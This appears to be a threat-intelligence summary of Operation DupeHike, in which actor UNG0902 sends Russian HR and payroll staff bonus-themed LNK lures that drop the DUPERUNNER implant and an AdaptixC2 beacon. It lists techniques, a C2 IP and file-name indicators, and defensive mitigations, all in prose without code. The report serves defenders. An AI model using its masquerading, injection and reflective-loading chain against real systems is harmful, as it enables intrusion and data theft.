Full Report
Contents Introduction Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings. Looking into the decoy-document Technical Analysis Stage 1 – Malicious LNK Script Stage 2 – DUPERUNNER Implant Stage 3 – AdaptixC2 Beacon. Infrastructural Artefacts. Conclusion SEQRITE Protection. IOCs MITRE ATT&CK. Introduction SEQRITE APT-Team have recently uncovered a campaign, which has been targeting Russian […] The post Operation DupeHike : UNG0902 targets Russian employees with DUPERUNNER and AdaptixC2 appeared first on Blogs on Information Technology, Network & Cybersecurity | Seqrite.
Analysis Summary
# Threat Actor: UNG0902
## Attribution & Identity
The threat actor responsible for this campaign is identified internally by SEQRITE APT-Team as **UNG0902**. No further external attribution or known aliases are mentioned in the provided context, aside from this internal designation.
## Activity Summary
The campaign, dubbed **Operation DupeHike**, recently targeted Russian corporate entities. The operation revolves around spear-phishing using malicious archives (ZIP files) containing decoy documents themed around sensitive internal matters (employee bonuses and financial policies) to achieve initial compromise. The actor successfully deployed a newly observed implant, tracked as **DUPERUNNER**, which subsequently loaded the **AdaptixC2 Beacon**. The operation was active as of November 21, 2025.
## Tactics, Techniques & Procedures
The actor uses a multi-stage infection chain:
* **Initial Access/Execution ($1$):** Malicious LNK files disguised as PDF documents delivered via ZIP archives. Execution initiated via PowerShell (`powershell.exe`) using the LNK file.
* **Defense Evasion / Masquerading:**
* LNK file masquerading as a PDF (`.pdf.lnk`).
* DLL posing as a ZIP.
* `fontawesome.woff` masquerading as a font file.
* AdaptixC2 uses packed shellcode appended behind magic bytes (`EZ`). (T1036, T1027)
* AdaptixC2 resolves APIs using djb2-style hashing and PEB traversal. (T1027.007)
* **Execution & Persistence (DUPERUNNER):**
* Downloads secondary stages using `powershell.exe` and **-WebRequest (iwr)**. (T1059.001)
* Process Injection: Injects shellcode into legitimate running processes like `explorer.exe`, `notepad.exe`, and `msedge.exe` via Remote Thread Injection. (T1055, T1055.003)
* Reflective Code Loading: AdaptixC2 payload is loaded reflectively from appended shellcode. (T1620)
* **Discovery:** Gathers system information (hostname, domain, system time, Temp directory) and enumerates active processes. (T1082, T1057)
* **Command & Control (AdaptixC2):**
* Uses HTTP GET for initial download from the C2 server (using the IP 46.149.71.230). (T1071.001)
* Communications are encoded via internal routines and use encryption. (T1132, T1573)
* Potential use of raw TCP for beaconing. (T1095)
* Exfiltration occurs via POST requests to the `/result` endpoint. (T1041)
* **Collection & Impact:** Capable of retrieving system files and exfiltrating stolen data from the victims' environments. (T1113, T1005, T1537)
## Targeting
* **Sectors:** Corporate Sector (General), specifically targeting **Human Resources & Payroll** departments.
* **Geography:** **Russian Federation**.
* **Victims:** Russian corporate entities (though specific organization names are not detailed).
## Tools & Infrastructure
* **Malware families used:**
* **DUPERUNNER:** The initial unknown implant downloaded via PowerShell.
* **AdaptixC2 Beacon:** The final stage C2 beacon established by DUPERUNNER.
* **Infrastructure:**
* C2 IP Address observed: `46.149.71.230`
* Artifacts used in download: `s.exe` (DUPERUNNER) and `fontawesome.woff` (AdaptixC2 stager/payload).
* Initial delivery file name observed: `Премия 2025.zip` (Bonus.Zip).
* LNK file name observed: `Документ_1_О_размере_годовой_премии.pdf.lnk` (Document\_1\_On\_the\_size\_of\_the\_annual\_bonus.pdf.lnk).
## Implications
UNG0902 demonstrates a sophisticated, multi-stage infection chain leveraging multi-layered defense evasion techniques (masquerading, injection, reflective loading) to deploy custom malware (DUPERUNNER and AdaptixC2) targeting sensitive internal corporate functions (HR/Payroll) within Russia. The focus on specific, high-value internal documents suggests an objective of gaining persistent access and extracting sensitive organizational or financial data.
## Mitigations
Defense should focus on:
1. **Email/Phishing Controls:** Thorough analysis of inbound ZIP archives and LNK files, especially those referencing administrative or financial lures.
2. **Powershell Logging and Analysis:** Monitor for suspicious PowerShell execution spawning network connections or file downloads (T1059.001).
3. **Process Monitoring:** Implement controls to detect and block **Process Injection** into legitimate processes like `explorer.exe`, `notepad.exe`, and `msedge.exe` (T1055).
4. **Application Control:** Restrict the execution of unknown or newly downloaded `.exe` files.
5. **Network Detection:** Identify beaconing activity characteristic of HTTP/Encrypted communications originating from compromised hosts to suspicious external IPs (e.g., 46.149.71.230).